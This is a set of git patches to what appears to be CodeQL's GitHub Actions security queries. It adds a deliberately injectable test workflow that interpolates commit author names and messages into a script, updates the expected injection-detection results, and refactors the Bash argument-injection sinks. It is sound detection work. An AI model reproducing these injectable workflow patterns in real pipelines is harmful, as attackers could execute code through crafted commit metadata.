secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-demo-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + + build-storybook: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-storybook-dev.outputs.preview-url == '' && steps.vercel-storybook.outputs.preview-url || steps.vercel-storybook-dev.outputs.preview-url }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + 
uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + # ================= Deploy Storybook ================= + - name: 📦 Build storybook + run: pnpm storybook:build + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-storybook + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (storybook) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-storybook-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + + notify: + runs-on: ubuntu-latest + needs: [setup, build-demo, build-storybook] + + steps: + - name: Invoke deployment hook + uses: actions/github-script@v3 + with: + script: > + { + "type": "build", + "workflow": { + "id": "${{ github.run_id }}" + }, + "commit": { + "ref": "${{ needs.setup.outputs.ref }}", + "message": "${{ needs.build-demo.outputs.commit-message }}", + "id": "${{ github.event.workflow_run.head_commit.id }}", + "author": "${{ github.event.workflow_run.head_commit.author.name }}" + }, + "preview": { + "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", + "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" + } + } + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4c9ea8fe8ca..699d53da9cc 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -145,6 +145,16 @@ edges | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | 
.github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -449,6 +459,19 @@ nodes | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | 
needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -596,6 +619,10 @@ subpaths | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 262912c58a5..6d33d3cc569 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -145,6 +145,16 @@ edges | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | 
.github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -449,6 +459,19 @@ nodes | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | 
needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 2e5379f289e88c64e6c151a7808ed898adea8dbf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 15:10:31 +0200 Subject: [PATCH 0586/1267] Update expected tests --- .../Security/CWE-074/OutputClobberingHigh.expected | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index 715e2c4c90c..af792f1ab65 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected 
@@ -1,6 +1,6 @@ edges | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | -| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | | .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | | 
.github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | 
@@ -24,7 +24,7 @@ nodes subpaths #select | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( Date: Tue, 15 Oct 2024 09:48:01 +0200 Subject: [PATCH 0587/1267] Move arg injection sinks to ShellScript class --- ql/lib/codeql/actions/Ast.qll | 8 ++ ql/lib/codeql/actions/Bash.qll | 52 ++++++++++-- ql/lib/codeql/actions/PowerShell.qll | 12 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 8 ++ .../security/ArgumentInjectionQuery.qll | 58 +++---------- ql/test/library-tests/commands.expected | 84 +++++++++---------- .../.github/workflows/arg_injection.yml | 12 +++ .../ArgumentInjectionCritical.expected | 1 - 8 files changed, 139 insertions(+), 96 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 620f74e25bb..e41354ce31b 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -354,6 +354,14 @@ class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl {
 predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) }
+ predicate getAnEnvReachingArgumentInjectionSink(string var, string command, string argument) {
+ super.getAnEnvReachingArgumentInjectionSink(var, command, argument)
+ }
+
+ predicate getACmdReachingArgumentInjectionSink(string cmd, string command, string argument) {
+ super.getACmdReachingArgumentInjectionSink(cmd, command, argument)
+ }
+
 predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) }
 predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) }
diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll
index 541ab437db2..12866a141a6 100644
--- a/ql/lib/codeql/actions/Bash.qll
+++ b/ql/lib/codeql/actions/Bash.qll
@@ -133,7 +133,8 @@ class BashShellScript extends ShellScript {
 this.doStmtRestoreQuotedStrings(i, round, _, new)
 |
 new order by round
- )
+ ) and
+ not result.indexOf("qstr:") > -1
 }
 private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) {
@@ -155,7 +156,8 @@ class BashShellScript extends ShellScript {
 this.doStmtRestoreCmdSubstitutions(i, round, _, new)
 |
 new order by round
- )
+ ) and
+ not result.indexOf("cmdsubs:") > -1
 }
 override string getAStmt() { result = this.getStmt(_) }
@@ -186,7 +188,8 @@ class BashShellScript extends ShellScript {
 this.doCmdRestoreQuotedStrings(i, round, _, new)
 |
 new order by round
- )
+ ) and
+ not result.indexOf("qstr:") > -1
 }
 private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) {
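Review bot: The two predicates added to `ShellScript` carry no QLDoc, and from the wrapper alone a reader cannot tell which of the three string parameters is the tainted source and which describe the sink. Judging by the Bash implementation later in this commit, `var`/`cmd` is the source and `command`/`argument` are captured from the sink command, so a line such as `/** Holds if the environment variable var is used in argument of command, where command is an argument injection sink. */` on the first, and the matching wording for command output on the second, would make the contract explicit. The class body starts and ends outside the hunk.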
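Review bot: The added `not result.indexOf("qstr:") > -1` in the first Bash.qll hunk (-133) gives the predicate no result at all for a line that still contains the placeholder text, and the same filter is repeated for `cmdsubs:` at -155 and -208 and for `qstr:` at -186. If a placeholder can survive the last restore round, that statement or command presumably vanishes from `getAStmt()`/`getACmd()` and is never offered to the sink predicates, and a run script whose own text contains `qstr:` or `cmdsubs:` would be dropped the same way, which is a silent false negative for every query built on these commands. Please state the intent in a comment such as `// keep only results in which every placeholder has been restored`, and consider a fixture with a literal `qstr:` in a run step. The enclosing predicates start outside these hunks.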
@@ -208,13 +211,16 @@ class BashShellScript extends ShellScript { this.doCmdRestoreCmdSubstitutions(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("cmdsubs:") > -1 } string getACmd() { result = this.getCmd(_) } override string getCommand(int i) { - result = this.getCmd(i) and + // remove redirection + result = + this.getCmd(i).regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") and // exclude variable declarations not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and // exclude the following keywords @@ -286,6 +292,18 @@ class BashShellScript extends ShellScript { Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) } + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + Bash::envReachingArgumentInjectionSink(this, var, command, argument) + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + Bash::cmdReachingArgumentInjectionSink(this, cmd, command, argument) + } + override predicate fileToGitHubEnv(string path) { Bash::fileToFileWrite(this, "GITHUB_ENV", path) } 
